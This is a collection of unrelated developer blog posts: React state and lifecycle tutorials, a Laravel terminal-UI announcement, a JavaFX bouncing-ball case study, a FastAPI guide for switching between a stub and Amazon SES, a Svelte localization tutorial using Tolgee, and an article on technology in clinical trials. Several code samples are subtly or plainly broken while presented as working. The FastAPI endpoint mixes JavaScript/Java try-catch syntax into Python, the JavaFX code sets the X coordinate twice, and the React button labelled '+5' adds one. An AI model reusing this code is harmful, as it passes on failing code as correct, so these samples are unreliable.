For example, think of a component as a form and props like a specific details you fill into the form. Or think of a component like a toy car, for the car to move, you need a battery (props).
**LOCAL STATE AND GLOBAL STATE**
These are important concepts for building dynamic and interactive user interfaces.
LOCAL STATE
Local state simply refers to state that is managed within a single components, this state is temporarily used to manage data or user interface states that does not require you to share with other components.
```
import React, {useState} from 'react'
function Counter(){
<!-- useState hook initializes the local state variable count to 0 -->
const [count , setCount] = useState(0);
return(
<!-- in this return, it returns HTML Syntax -->
<div>
<p>You Clicked {count} times</p>
<button onClick={()=> setCount(count + 1)}> Click me</button>
</div>
);
}
export default Counter;
```
Explanation of the above code
useState(0): this help us initialize the local state variable count with a value of 0 (the count starts from a default value of 0).
state variable: count holds the current state, and setCount is the function used to update the state.
updating a state: when the button is clicked, setCount(count + 1)updates the count state, which triggers a re-render of the component with the new state value.
GLOBAL STATE
Global state is used when you want to share state across multiple components. This can be used using context API, Redux, or Recoil.
```
import React, { useState, createContext, useContext } from 'react';
// Create a Context for the global state
const CountContext = createContext();
function CounterProvider({ children }) {
const [count, setCount] = useState(0);
return (
<CountContext.Provider value={{ count, setCount }}>
{children}
</CountContext.Provider>
);
}
function CounterDisplay() {
const { count } = useContext(CountContext);
return <p>Global count is {count}</p>;
}
function CounterButton() {
const { setCount } = useContext(CountContext);
return (
<button onClick={() => setCount(prevCount => prevCount + 1)}>
Increase Global Count
</button>
);
}
function App() {
return (
<CounterProvider>
<CounterDisplay />
<CounterButton />
</CounterProvider>
);
}
export default App;
```
Explanation to the above code
createContext() create a context object which holds the global state.
CounterProvider wraps its children in CountContext.Provider, providing the count state and setCount function to all nested components.
CounterDisplay and CounterButton use useContext(CountContext) to access global state. CounterDisplay reads the count, and CounterButton updates the count.
Context API: it is a built-in React API for managing global state without prop drilling.
***FUNCTIONAL COMPONENTS***
This is a javascript fuctions, it accepts a single object argument and returns a react element
(JSX code to render in the DOM tree). In functional components, we do not have this.state.
```
function function_name(pass the argument name)
{
pass the function_body
}
```
For Example
```
import React, {useState} from 'react'
const functionalComponent = ()=> {
const [count, setCount] = useState(0);
const increase = () => {
setCount(count + 1);
}
return (
<div>
<h1>{count}</h1>
<button onClick = {increase}>+5</button>
</div>
)
}
export default functionalComponent
```
EXPLANATION OF THIS CODE ABOVE
The provided React functional component imports React and the useState hook, defines a component named functionalComponent that uses useState to manage a count state initialized to default state 0, includes an increase function that increments count by 1, returns JSX to display the current count in an h1 element and a button labeled "+5" that calls increase when clicked, and exports the component; however, the button label suggests it should increase by 5, so the increase function should be adjusted accordingly to increment by 5 instead of 1.
**CLASS COMPONENTS**
It extends React.component and include a render method to return JSX, it also manages a state using this.state and update state using this.setState and leverage on lifecycle method.
**LIFECYCLE METHODS IN CLASS COMPONENTS**
Lifecycle methods in class components provide hooks into the component's lifecycle, allowing you to run code at specific times during the component's life. This includes mounting, updating, and unmounting phases, as well as error handling. These methods are useful for managing side effects, optimizing performance, and ensuring proper cleanup.
Breakdown of Lifecycle Methods
Mounting Phase
- constructor(props)
Initializes the component state.
Binds methods to the component instance.
Called once when the component is created.
- static getDerivedStateFromProps(props, state)
Syncs the state to the props when the component receives new props.
Can return an object to update the state, or null if no state update is needed.
Called during both the mounting and updating phases.
- componentDidMount()
Invoked immediately after the component is mounted.
Used for side effects like fetching data or initializing third-party libraries.
Called once after the initial render.
Updating Phase
- shouldComponentUpdate(nextProps, nextState)
Determines whether the component should re-render in response to state or prop changes.
Returns true (default) to re-render, or false to prevent re-rendering.
Useful for performance optimization.
- getSnapshotBeforeUpdate(prevProps, prevState)
Captures information from the DOM before it is updated.
The value returned is passed to componentDidUpdate.
Used for tasks like saving the scroll position before an update.
- componentDidUpdate(prevProps, prevState, snapshot)
Invoked immediately after the component updates.
Receives previous props, state, and the snapshot from
- getSnapshotBeforeUpdate.
Used for performing operations that depend on the DOM being updated.
Unmounting Phase
- componentWillUnmount()
Invoked immediately before the component is unmounted and destroyed.
Used for cleanup tasks like cancelling network requests or removing event listeners.
Error Handling
- static getDerivedStateFromError(error):
Used to update the state so the next render shows an error boundary.
- componentDidCatch(error, info)
Used to log error information and display a fallback UI in case of an error.

Example of a code:
```
import React, { Component } from 'react';
class LifecycleDemo extends Component {
constructor(props) {
super(props);
this.state = { count: 0 };
console.log('Constructor: Component is being initialized');
}
static getDerivedStateFromProps(props, state) {
console.log('getDerivedStateFromProps: Sync state to props changes');
return null; // Return null to indicate no change to state
}
componentDidMount() {
console.log('componentDidMount: Component has been mounted');
}
shouldComponentUpdate(nextProps, nextState) {
console.log('shouldComponentUpdate: Determine if re-render is necessary');
return true; // Return true to proceed with rendering
}
getSnapshotBeforeUpdate(prevProps, prevState) {
console.log('getSnapshotBeforeUpdate: Capture current state before update');
return null; // Return a value to be passed to componentDidUpdate
}
componentDidUpdate(prevProps, prevState, snapshot) {
console.log('componentDidUpdate: Component was re-rendered');
}
componentWillUnmount() {
console.log('componentWillUnmount: Component is being unmounted');
}
increaseCount = () => {
this.setState({ count: this.state.count + 1 });
}
render() {
console.log('Render: Component is rendering');
return (
<div>
<h1>{this.state.count}</h1>
<button onClick={this.increaseCount}>Increase</button>
</div>
);
}
}
export default LifecycleDemo;
```
Explanaton to above code
import react, {component} from 'react': react is the main react library while component is the base class for creating react class components.
LifecycleDemo: this is the name of the class component extending component.
constructor(props): initialize the components with props.
super(props): calls the parent class constructor with props.
this.state: set the initial state with count set to 0.
getDerivedStateFromProps: a static method used to update the state based on the props changes.
return null: indicate no changes to the state.
componentDidMount: called after the component is added to the DOM.
shouldComponentUpdate: determines if a re-render is necessary.
nextProps, nextState: new props, new state.
return true: indicate the component should re-render.
getSnapshotBeforeUpdate: this is called right before DOM updates (captures state before DOM updates).
preProps, prevState: the previous props and state.
return null: indicate no snapshop value to be passed.
componentDidUpdate: called after the component updates. I.e executes code after the component updates.
snapshot: value returned from `getSnapshotBeforeUpdate.`
componentWillUnmount: called right before the component is removed from the DOM. It cleans up before the component unmounts.
this.setState: updates the state with the new count value.
render: it is a required method to returning JSX to define the component's UI.
**DIFFERENCE BETWEEN FUNCTIONAL COMPONENTS AND CLASS COMPONENTS**
Functional components uses hooks (useState, useeffect) to manage the state and side effects while class component uses the this syntax and lifecycle methods for state and behavior management.

image source:geeks4geeks | devmariam |
1,899,394 | Introducing LaraTUI: A Terminal UI for Laravel Environments | I'm excited to introduce LaraTUI, a new open-source project I've been working on. LaraTUI is a... | 0 | 2024-06-24T23:02:13 | https://dev.to/mtk3d/introducing-laratui-a-terminal-ui-for-laravel-environments-2b68 | laravel, php, tui | I'm excited to introduce LaraTUI, a new open-source project I've been working on. LaraTUI is a terminal user interface designed to help you manage your Laravel local environment using PHP. It's still a work in progress!

**Current Features:**
- Sail Service Info: See your sail services status
- Composer Versions check: Check for new updates to your Composer packages
- Migrations info: Get information about new migrations pending to run
**Planned Features:**
- Artisan Commands: Run Artisan commands directly from the interface.
- Migration Management: View and run pending migrations.
- Sail Service Management: Start/Stop and mange your local sail environment.
- Log Viewing: Access and filter your application logs.
- Environment Variables: Verify your .env settings within the TUI.
## Why PHP for a TUI?
Using PHP for a terminal UI is not very common, but it offers a great way to leverage the existing Laravel ecosystem and my PHP knowledge for a new kind of tool. It's also possible thanks to awesome php-tui library: https://github.com/php-tui/php-tui
## Get Involved
LaraTUI is open source, and I'd love to get feedback and contributions from the community.
Check it out on GitHub: https://github.com/mtk3d/LaraTUI
Feel free to share your thoughts and suggestions!
Happy coding! 🚀 | mtk3d |
1,899,390 | Case Study: Bouncing Ball | This section presents an animation that displays a ball bouncing in a pane. The program uses Timeline... | 0 | 2024-06-24T22:37:41 | https://dev.to/paulike/case-study-bouncing-ball-39cj | java, programming, learning, beginners | This section presents an animation that displays a ball bouncing in a pane.
The program uses **Timeline** to animation ball bouncing, as shown in Figure below.

Here are the major steps to write this program:
1. Define a subclass of **Pane** named **BallPane** to display a ball bouncing, as shown in code below.
2. Define a subclass of **Application** named **BounceBallControl** to control the bouncing ball with mouse actions, as shown in the program below. The animation pauses when the mouse is pressed and resumes when the mouse is released. Pressing the UP and DOWN arrow keys increases/decreases animation speed.
The relationship among these classes is shown in Figure below.

```
package application;
import javafx.animation.KeyFrame;
import javafx.animation.Timeline;
import javafx.beans.property.DoubleProperty;
import javafx.scene.layout.Pane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.util.Duration;
public class BallPane extends Pane {
public final double radius = 20;
private double x = radius, y = radius;
private double dx = 1, dy = 1;
private Circle circle = new Circle(x, y, radius);
private Timeline animation;
public BallPane() {
circle.setFill(Color.GREEN); // Set ball color
getChildren().add(circle); // Place a ball into this game
// Create an animation for moving the ball
animation = new Timeline(new KeyFrame(Duration.millis(50), e -> moveBall()));
animation.setCycleCount(Timeline.INDEFINITE);
animation.play(); // Start animation
}
public void play() {
animation.play();
}
public void pause() {
animation.pause();
}
public void increaseSpeed() {
animation.setRate(animation.getRate() + 0.1);
}
public void decreaseSpeed() {
animation.setRate(animation.getRate() > 0 ? animation.getRate() - 0.1 : 0);
}
public DoubleProperty rateProperty() {
return animation.rateProperty();
}
protected void moveBall() {
// Check boundaries
if(x < radius || x > getWidth() - radius) {
dx *= -1; // Change ball move direction
}
if(y < radius || y > getHeight() - radius) {
dy *= -1; // Change ball move direction
}
// Adjust ball position
x += dx;
y += dy;
circle.setCenterX(x);
circle.setCenterX(y);
}
}
```
**BallPane** extends **Pane** to display a moving ball (line 10). An instance of **Timeline** is created to control animation (lines 22). This instance contains a **KeyFrame** object that invokes the **moveBall()** method at a fixed rate. The **moveBall()** method moves the ball to simulate animation. The center of the ball is at (**x**, **y**), which changes to (**x + dx**, **y + dy**) on the next move (lines 57–58). When the ball is out of the horizontal boundary, the sign of **dx** is changed (from positive to negative or vice versa) (lines 49–51). This causes the ball to change its horizontal movement direction. When the ball is out of the vertical boundary, the sign of **dy** is changed (from positive to negative or vice versa) (lines 52–54). This causes the ball to change its vertical movement direction. The **pause** and **play** methods (lines 27–33) can be used to pause and resume the animation. The **increaseSpeed()** and **decreaseSpeed()** methods (lines 35–41) can be used to increase and decrease animation speed. The **rateProperty()** method (lines 43–45) returns a binding property value for rate.
```
package application;
import javafx.application.Application;
import javafx.stage.Stage;
import javafx.scene.Scene;
import javafx.scene.input.KeyCode;
public class BounceBallControl extends Application {
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
BallPane ballPane = new BallPane(); // Create a ball pane
// Pause and resume animation
ballPane.setOnMousePressed(e -> ballPane.pause());
ballPane.setOnMouseReleased(e -> ballPane.play());
// Increase and decrease animation
ballPane.setOnKeyPressed(e -> {
if(e.getCode() == KeyCode.UP) {
ballPane.increaseSpeed();
}
else if(e.getCode() == KeyCode.DOWN) {
ballPane.decreaseSpeed();
}
});
// Create a scene and place it in the stage
Scene scene = new Scene(ballPane, 250, 150);
primaryStage.setTitle("FlagRisingAnimation"); // Set the stage title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
// Must request focus after the primary stage is displayed
ballPane.requestFocus();
}
public static void main(String[] args) {
Application.launch(args);
}
}
```
The **BounceBallControl** class is the main JavaFX class that extends **Application** to display the ball pane with control functions. The mouse-pressed and mouse-released handlers are implemented for the ball pane to pause the animation and resume the animation (lines 13 and 14). When the UP arrow key is pressed, the ball pane’s **increaseSpeed()** method is invoked to increase the ball’s movement (line 19). When the DOWN arrow key is pressed, the ball pane’s **decreaseSpeed()** method is invoked to reduce the ball’s movement (line 22).
Invoking **ballPane.requestFocus()** in line 33 sets the input focus to **ballPane**. | paulike |
1,895,309 | Implementing a Mail Delivery Switch in Python for Local and AWS Environments Using Amazon SES | TL;DR This post details how to seamlessly switch between a local stub and Amazon SES for... | 0 | 2024-06-24T22:32:40 | https://dev.to/kojiisd/implementing-a-mail-delivery-switch-in-python-for-local-and-aws-environments-using-amazon-ses-2kp2 | aws, python, ses | ## TL;DR
This post details how to seamlessly switch between a local stub and Amazon SES for email sending in a Python + FastAPI application, based on the presence of an AWS profile. This ensures that your email functionality can be tested locally without needing AWS credentials.
## Introduction
Here's how you can manage email notifications with Amazon SES during local development without AWS credentials. Using a Python decorator, you can switch between a stub function for local testing and SES for production. I've also included a complete implementation example with FastAPI.
## Prerequisites
The application is developed using Python and FastAPI.
It's deployed on AWS Fargate or EC2 instances.
Problem Statement
Integrating Amazon SES to send email notifications directly ties the application's functionality to AWS credentials availability, hindering local development and testing.
## Solution
The solution involves creating a Python decorator that toggles the mail sending method based on the existence of an AWS_PROFILE environment variable. This allows the use of a stub function for local development and Amazon SES in production. Here's how to implement it:
```python
import os
import functools
def switch_mailer(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if os.environ.get('AWS_PROFILE') == '':
return stub_send_email(*args, **kwargs)
else:
return func(*args, **kwargs)
return wrapper
def stub_send_email(to_address, subject, body):
print("Stub: Sending email to", to_address)
# The stub simulates a successful email sending response
return {'MessageId': 'fake-id', 'Response': 'Email sent successfully'}
@switch_mailer
def send_email(to_address, subject, body):
ses_client = boto3.client('ses')
response = ses_client.send_email(
Source='your_email@example.com',
Destination={
'ToAddresses': [
to_address
]
},
Message={
'Subject': {
'Data': subject
},
'Body': {
'Text': {
'Data': body
}
}
}
)
return response
```
### Example: Complete FastAPI Application Setup
To further demonstrate the implementation of our mail delivery switch with Amazon SES, here is a complete FastAPI application that you can run locally or in your AWS environment.
### Implementation
Here's how to set up a FastAPI application that incorporates our mail switching mechanism:
```python
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
import os
import functools
import boto3
# Define the decorator to switch mail sender
def switch_mailer(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if os.environ.get('AWS_PROFILE', '') == '':
return stub_send_email(*args, **kwargs)
else:
return func(*args, **kwargs)
return wrapper
# Stub function for local testing
def stub_send_email(to_address, subject, body):
print("Stub: Sending email to", to_address)
return {'MessageId': 'fake-id', 'Response': 'Email sent successfully'}
# Function to send email using Amazon SES
@switch_mailer
def send_email(to_address, subject, body):
ses_client = boto3.client('ses', region_name='us-east-1')
response = ses_client.send_email(
Source='your_email@example.com',
Destination={'ToAddresses': [to_address]},
Message={
'Subject': {'Data': subject},
'Body': {'Text': {'Data': body}}
}
)
return response
# FastAPI application definition
app = FastAPI()
class EmailRequest(BaseModel):
to_address: str
subject: str
body: str
@app.post("/send-email/")
def handle_send_email(request: EmailRequest):
try {
response = send_email(request.to_address, request.subject, request.body)
return {"message": "Email sent successfully", "response": response}
} catch(Exception e) {
throw new HTTPException(statusCode: 500, detail: e.toString())
}
}
# To run the application:
# pip install boto3 pydantic fastapi uvicorn
# uvicorn main:app --reload
```
### Sample JSON Request
Use this JSON payload to test the /send-email/ endpoint in your local or AWS environment:
```json
{
"to_address": "recipient@example.com",
"subject": "Hello from FastAPI",
"body": "This is a test email sent via FastAPI and AWS SES."
}
```
### Runtime Logs
When you run the FastAPI application using the provided command and send a test email through the /send-email/ endpoint, you should see the following logs, which confirm that the application is functioning as expected:
```
INFO: Started server process [53956]
INFO: Waiting for application startup.
INFO: Application startup complete.
Stub: Sending email to recipient@example.com
```
These logs indicate that the server has started successfully and the stub function is being called to simulate sending an email. This output is expected when running locally without an AWS_PROFILE set.
## Conclusion
By implementing a dynamic mail sender that adjusts based on the environment, developers can ensure their application remains functional and testable regardless of the deployment context. This method not only simplifies the development process but also enhances the application's adaptability.
| kojiisd |
1,899,389 | Implementing localization to your Svelte App: A step-by-step guide | In today's global market, making your web application accessible to a diverse audience is crucial.... | 0 | 2024-06-24T22:23:15 | https://tolgee.io/blog/implementing-localization-to-your-svelte-app | svelte, i18n, webdev, tutorial | In today's global market, making your web application accessible to a diverse audience is crucial. Localization enables apps to adapt to different languages and cultural contexts, enhancing user experience.
[Tolgee](https://tolgee.io) simplifies localization with its open-source i18n tool, combining a localization platform and SDKs. It provides features like in-context translation and automatic screenshot generation, making translation easy for developers and translators. Svelte is an open-source frontend framework that compiles components into small, performant JavaScript modules.
In this tutorial, you'll learn how to implement localization in your Svelte app using Tolgee. Let's get started!
## Prerequisites
This tutorial assumes that you have familiarity with JavaScript. Knowledge of Svelte is not required but is good to have. You will also need the following, to follow the tutorial.
- Node.js: Install [Node.js](https://nodejs.org/) on your machine if you don’t already have it installed. Use a node version manager tool like [nvm](https://github.com/nvm-sh/nvm) to install Node.js.
- Tolgee account: You will be using Tolgee to implement localization. Hence, if you don’t have an account, please [sign-up here](https://app.tolgee.io/sign_up?utm_source=svelte-integration-blog) to create an account.
- Git: Install Git for your machine. You will use Git for cloning the repo and version management.
## Step 1 - Setting up the Svelte App
For this tutorial, you will use the [Svelte Tolgee example project](https://github.com/harshil1712/svelte-tolgee-example). This project is a personal blogging website built using [TailwindCSS](https://tailwindcss.com/). If you want to create your own Svelte app, follow the official [Svelte documentation](https://svelte.dev/docs/introduction). While following the steps further down this tutorial, make sure to adapt to your app.
To clone the project, run the following command in your terminal.
```bash
git clone https://github.com/harshil1712/svelte-tolgee-example.git
```
Next, navigate into the project directory and run the following command to install the required dependencies.
```bash
cd svelte-tolgee-example
npm install
```
Now that you have all the required dependencies installed, run the development server and check out the project. To start the development server, execute the following command in your terminal.
```bash
npm run dev
```
On your browser, navigate to `http://localhost:5137`. You will see the sample app up and running.

## Step 2 - Getting started with Tolgee
In the previous step you scaffolded the Svelte project. In this step you will learn how to get started with Tolgee to integrate it in your Svelte project.
If you don’t have a Tolgee account, create one. After you sign-up/sign in for the first time, you will be presented with a demo project. While that is a good place to explore the platform in depth, for this tutorial, you will create a new project.
To create a new project, click on the **+ Add Project** button. Next, enter the name of your project in the **Name** field and select the translation languages you. This tutorial implements English (en) and German (de). But you can select other languages as well.


Now that you have the project setup on Tolgee, the next step is to generate the API key. This API key will allow your application to interact with the Tolgee platform. To generate the API key, select **Integrate** from the left sidebar menu. Next, under the **Choose your weapon** section, select **_Svelte_**. Click on the dropdown menu under the **Select API key** section, and select **_Create new +_**.

Enter the name for your API key in the **Description** field. Set the **Expiration** to **_Never expires_**.
> **Note:** For the purpose of this tutorial, the Expiration is set to Never expires. Please make sure you are following the best security practices and have set a proper expiration time for the API key.
Next, under **Scopes**, select **_Admin_**. This will give you all the permissions. Click on Save, and your API key will be generated. Scroll down to the Setup your environment (with SvelteKit) section. Copy the URL and the API Key. You will need these in the next step.
> **Note:** Before setting up the API key for production, carefully read and understand Scopes. You don’t want to give everyone the admin access.

## Step 3 - Integrating Tolgee in the Svelte app
In the previous step, you configured the Tolgee platform by adding a new project and generating an API key. In this step, you will integrate Tolgee in your Svelte app.
First, at the root of your project, create a `.env.development.local` file. Paste the URL and the API key you copied in the previous step. Your file should contain the content as shown below, where `<YOUR_TOLGEE_API_KEY>` is the API key you generated.
```
VITE_TOLGEE_API_URL=https://app.tolgee.io
VITE_TOLGEE_API_KEY=<YOUR_TOLGEE_API_KEY>
```
Next, to start using Tolgee and make use of its SDK, you need to install the Tolgee SDK for Svelte. To install this SDK, execute the following command in your terminal.
```bash
npm install @tolgee/svelte
```
You have installed the required SDK and also have the API key to connect to Tolgee. In the next step, you will initialize the Tolgee SDK for your app.
## Step 4 - Initializing Tolgee for Svelte
Tolgee comes with a [provider component](https://tolgee.io/js-sdk/integrations/svelte/api#tolgeeprovider). This component provides the required context to all the children components it gets wrapped on. You will use this provider component to wrap all the child components with some configurations.
Open up the `src > routes > +layout.svelte` file and paste the following code under the `<script>` tag. This line of code imports the required methods from the Tolgee SDK.
```ts
import { TolgeeProvider, Tolgee, DevTools, FormatSimple } from '@tolgee/svelte';
```
Next, to configure Tolgee, add the following code under the import statement.
```ts
const tolgee = Tolgee()
.use(DevTools())
.use(FormatSimple())
.init({
defaultLanguage: 'en',
availableLanguages: ['en', 'de']
apiUrl: import.meta.env.VITE_TOLGEE_API_URL,
apiKey: import.meta.env.VITE_TOLGEE_API_KEY,
});
```
In the above code, you initialize Tolgee passing on the DevTools and FormatSimple methods. You also configure the default and available languages for your app. Lastly, you configure your Tolgee credentials.
Your updated `<script>` tag should be as follows.
```ts
<script>
import Navbar from '../components/Navbar.svelte';
import { TolgeeProvider, Tolgee, DevTools, FormatSimple } from '@tolgee/svelte';
const tolgee = Tolgee()
.use(DevTools())
.use(FormatSimple())
.init({
defaultLanguage: 'en',
apiUrl: import.meta.env.VITE_TOLGEE_API_URL,
apiKey: import.meta.env.VITE_TOLGEE_API_KEY,
availableLanguages: ['en', 'de']
});
</script>
```
Now that you have imported the provider and configured it, the next step is to wrap the children components. In your `+layout.svelte file`, update the HTML code as follows.
```html
<TolgeeProvider tolgee="{tolgee}">
<div slot="fallback">Loading...</div>
<div class="min-h-screen bg-gray-100">
<Navbar />
<div class="container mx-auto px-4 py-8">
<slot />
</div>
</div>
</TolgeeProvider>
```
In the above code, you wrap the children components under the `<TolgeeProvider>` component. You pass the `tolgee` configuration and add a fallback component. While the translation gets loaded, the user will see this fallback component. You can modify this fallback component.
## Step 5 - Implementing localization
In the previous step, you have initialized Tolgee. In this step, you will learn to implement localization using Tolgee. You will update the navigation bar option elements. These elements will render the localized content for the selected language.
In your `src > components > Navbar.svelte` file, import the [T component (Translation component)](https://tolgee.io/js-sdk/integrations/svelte/api#t-component) from the Tolgee SDK. Paste the following code in the `<script>` tag.
```ts
import { T } from '@tolgee/svelte';
```
Next, replace the text for anchor tag with `<T keyName=”navbar_<VALUE>” defaultValue=”<VALUE>”/>`. Here, `<VALUE>` is the title of the page. The `T` component takes `keyName` and `defaultValue` as parameters. The keyName parameter helps to identify the content. For each unique translating content, its value should be unique. The `defaultValue` parameter takes the value that should be rendered by default. Your `+Navbar.svelte` file should be as follows.
```html
<script>
import { T } from '@tolgee/svelte';
</script>
<nav class="bg-white shadow">
<div class="container mx-auto px-4">
<div class="flex justify-between items-center py-6">
<div class="text-xl font-semibold text-gray-900">My Blog</div>
<div class="space-x-4">
<a href="/" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_home" defaultValue="Home"
/></a>
<a href="#" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_about" defaultValue="About"
/></a>
<a href="#" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_contact" defaultValue="Contact"
/></a>
</div>
</div>
</div>
</nav>
```
Run the development server by executing the following command and navigate to `http://localhost:5137`.
```bash
npm run dev
```
One of the features of Tolgee is in-context translation. In the previous step, you configured the Dev Tools provided by the Tolgee SDK. Press and hold the Option/ALT key on your keyboard and hover over the title. You will observe a red border around the title. If you click on the title holding the Option/ALT key, a Quick Translation window pops up. This is where you can add translation and screenshots.

## Step 6 - Using in-context Translation
In the previous step, you implemented the `T` component. This enabled you to use in-context translation for your app. In this step, you will use in context translation to add translation.
To get started with in-context translation, press and hold the **Option/ALT** key and click on **Home**. It will open up a pop window.

Enter the English blog title in the **English** field. Add the German translation of the title in the **German** field. Optionally, you can add screenshots in the Screenshot section. Click on **Save** to save your translation.
You can view this translation on the Tolgee platform. You can also modify it via the platform or via in-context translation option.
There might be scenarios where you want to use the platform to manage translations. In the next step, you will learn how to add translation on the platform.
## Step 7 - Manage Translation on the Platform
To use the platform to manage translation, make sure you are logged into the platform. Next, navigate to the project you created for this application. Click on **Translations** from the left sidebar. You will see the translation for Home is already available there.

To add translation for the About option, click on + on the right corner. Enter `navigation_about` in the **Key field**.
> **Note:** The key must be unique. It should match the value you pass to the T component.
Enter the English translation in the **English** field and click on **Save**. This will generate the key.

To add the German translation for this key, click on **German** under **navigation_about**. Tolgee uses various APIs to provide the translations. You can use one of the provided translations or add your own. To use the translation that Tolgee provides, select one of the translations from the **Machine Translation** section. Click on **Save**, to save the translation.

You now have translations for Home and About. However, you can’t really view them in your app without changing the language. In the next step, you will add a language switcher for your application.
## Step 8 - Adding a Language Switcher
Irrespective of where the user is based, you should give the user an option to view the content in the language of their choice. Adding a language switcher to your app can help the user select the language from available choices. In this step, you will add a language switcher.
To add a language switcher, open the `Navbar.svelte` file and update the `<script>` tag with the following code.
```ts
import { T, getTolgee, getTolgeeContext } from '@tolgee/svelte';
const { tolgee } = getTolgeeContext();
const availableLanguages = tolgee.getInitialOptions().availableLanguages;
```
In the above code, you import the required methods. You get the reference to the Tolgee instance you configured in Step 4. Next, you get the list of all the configured available languages for your app. You will use this list to provide options to the users.
You also need to add a function that listens to the change of language. Paste the following in the `<script>` tag to add this function.
```ts
const t = getTolgee(['language']);
function handleLanguageChange(e) {
$t.changeLanguage(e.currentTarget.value);
}
```
The above subscription function listens for the change in language. When the language changes, it gets updated and the respective translated content is displayed to the user.
The last step is to show the user a switch component. To add this component, paste the following code under the `<div id=”switch”>` tag.
```html
<select value="{$t.getLanguage()}" on:change="{handleLanguageChange}">
{#each availableLanguages as lan}
<option>{lan}</option>
{/each}
</select>
```
Your finished `Navbar.svelte` file should have the following code.
```html
<script>
import { T, getTolgee, getTolgeeContext } from '@tolgee/svelte';
const { tolgee } = getTolgeeContext();
const availableLanguages = tolgee.getInitialOptions().availableLanguages;
const t = getTolgee(['language']);
function handleLanguageChange(e) {
$t.changeLanguage(e.currentTarget.value);
}
</script>
<nav class="bg-white shadow">
<div class="container mx-auto px-4">
<div class="flex justify-between items-center py-6">
<div class="text-xl font-semibold text-gray-900">My Blog</div>
<div class="space-x-4">
<a href="/" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_home" defaultValue="Home"
/></a>
<a href="#" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_about" defaultValue="About"
/></a>
<a href="#" class="text-gray-600 hover:text-gray-900"
><T keyName="navigation_contact" defaultValue="Contact"
/></a>
</div>
<div id="switch">
<select value="{$t.getLanguage()}" on:change="{handleLanguageChange}">
{#each availableLanguages as lan}
<option>{lan}</option>
{/each}
</select>
</div>
</div>
</div>
</nav>
```
Save the file with the updated code. Start the development server, if it is not running already. The navigation bar should have a language switcher. Try changing the language, and you should see the respective translated content.


Congratulations, you have successfully implemented localization to your Svelte app using Tolgee.
## Conclusion
Tolgee allows you to seamlessly implement localization to your app. It provides features like in-context translation and SDK that makes it easy for your team to manage translations.
In this article, you learned about Tolgee and how to integrate it with Svelte. You implemented localization to the navigation bar. Which means, you only scratched the surface! The next step is to implement localization to the rest of your application.
If you ran into issues while following this tutorial, feel free to hit me up on [LinkedIn](http://linkedin.com/in/harshil1712)/[X (formerly Twitter)](http://x.com/harshil1712). I would be happy to help you. If you have more questions about Tolgee, I encourage you to join the official [Slack workspace](https://Tolg.ee/slack).
I am looking forward to seeing your localized apps! | harshil1712 |
1,899,388 | The Role of Technology in Optimizing Clinical Trial Processes | The Changing Landscape of Clinical Trials Clinical trials, which evaluate medical... | 0 | 2024-06-24T22:20:37 | https://dev.to/mcdowell/the-role-of-technology-in-optimizing-clinical-trial-processes-50d5 | clinicalresearchmanageme, clinicaltrialprocess | ##The Changing Landscape of Clinical Trials
Clinical trials, which evaluate medical interventions for patient safety and efficacy, are complex undertakings. These trials involve numerous stages, including the design, coordination, and management of tasks that can take place in several global locations and require meticulous data handling and participant management. Historically, the breadth of these responsibilities has often led to inefficiencies and delays, with logistical bottlenecks and data integration issues frequently hindering progress. However, the rapid advancement of technology over the past few decades has dramatically transformed the landscape of clinical trials. Modern innovations, particularly in artificial intelligence and AI-augmented tools, have introduced new capabilities for streamlining workflows, enhancing data accuracy, and improving communication channels across all stages of clinical research. These technological enhancements not only simplify the intricate processes involved but also pave the way for more precise and timely results. There are so many ways in which technology has optimized the clinical trial process, that it warrants breaking down some of the particular areas that significant leaps forward in the field of medical research have been made.
## **What Has Been Optimized?**

Photo by [Unsplash](https://unsplash.com/photos/grayscale-photo-of-man-89rul39ox2I)
**Engagement and Collaboration:** The evolution of technology, particularly with the advent of AI-augmented tools, has profoundly enhanced site engagement, collaboration, and general [clinical research management](https://www.innovocommerce.com/studycloud). Before this digital revolution, fostering efficient cooperation among various stakeholders—such as sponsors, contract research organizations (CROs), and clinical sites—posed substantial challenges. Communication was slow and often cumbersome, significantly hindering the speed of work.
Today, the landscape is markedly different. Advanced platforms integrate AI-enhanced document sharing, procedural oversight tools, and secure communication methods like instant messaging and video conferencing into a single interface. These integrations not only facilitate seamless interaction but also enhance the security and oversight of clinical trials. By consolidating these tools into one platform, the process becomes more streamlined, reducing fragmented interactions and redundancies. This technological synergy not only simplifies site operations but also ensures that all parties have comprehensive oversight, dramatically improving the efficacy and efficiency of clinical trials.
**Automation of Key Processes:** The incorporation of technological advancements and AI-augmented tools into the clinical trial process has revolutionized the automation of key procedures, addressing what were once time-consuming but essential tasks. Areas such as document management, site onboarding, and regulatory compliance, traditionally executed manually, can now be automated, significantly enhancing efficiency and reducing the propensity for human error—one of the most significant impediments in clinical trials.
This is also an area where AI tools can greatly contribute to clinical trials by intelligently classifying documents and streamlining safety reporting processes. This automation not only alleviates administrative burdens but also expedites workflows, ensuring that clinical trials adhere to strict schedules. The result is a more reliable, faster, and precise handling of trial data, underscoring the critical role of AI in transforming the landscape of clinical trial management. This shift towards automated systems not only refines accuracy but also frees up valuable resources, allowing research teams to focus more on the strategic aspects of trial management and patient care.
**Enhanced Data Visibility and Analytics:** Technological advancements and AI-augmented tools have markedly improved [data analytics](https://dev.to/ayushi200124/data-analytics-case-study-101-1dl6) and visibility in the clinical trial process, revolutionizing how information is shared and understood. Unlike in the past, when data sharing was more uniform and required extensive interpretation, modern tools now facilitate various organizational and visualization techniques.
Data flexibility allows all stakeholders, including sponsors and CROs, typically more distant from day-to-day operations, to access real-time insights into trial progress, site performance, and patient recruitment metrics. Enhanced visibility into these critical aspects enables more precise and informed decision-making, ensuring comprehensive management and a more holistic overview of trial-related data, thereby optimizing the entire clinical trial process.
